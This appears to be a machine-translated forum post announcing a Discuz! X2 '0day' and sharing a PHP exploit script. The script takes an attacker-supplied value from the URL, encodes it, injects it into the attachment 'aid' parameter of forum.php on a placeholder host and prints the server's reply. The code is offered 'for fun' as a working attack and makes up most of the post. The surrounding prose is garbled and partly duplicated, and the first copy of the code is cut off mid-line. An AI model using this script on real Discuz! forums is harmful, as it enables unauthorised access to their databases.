Discuz! The 0day of X2 has come to an end with the Code published a few days ago. How do you know Discuz! Abnormal password encryption. It is useless when it comes out. This is the constructed EXP. It's useful to play .? Phpglobal $ tmp_expstr, $ id; $ id $ _ GETid; $ _ GET [
Discuz! The 0day of X2 was announced with the code used a few days ago.
In fact, most of them are chicken ribs. How do you know Discuz! Abnormal password encryption. Exposed
Useless. This is the constructed EXP. Take it for fun.
phpglobal $tmp_expstr, $id;$id=$_GET['id'];//$_GET['$tmp_expstr'];//$id=str_replace(" ","%20",$id);//$id=str_replace("=","%3D",$id); $tmp_expstr = $id;//$tmp_expstr ="'";//$id = $tmp_expstr; function getData($host,$path,$expdata,$data){ global $host, $path, $tmp_expstr; $host = "www.xxx.com"; $expdata = "/forum/forum.php?mod=attachment&findpost=ss&aid=".urlencode(urlencode(base64_encode($tmp_expstr))); $data = "GET $expdata HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($expdata)."\r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $expdata; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 7); return $resp; } echo getData($host,$path,$expdata,$data);?> |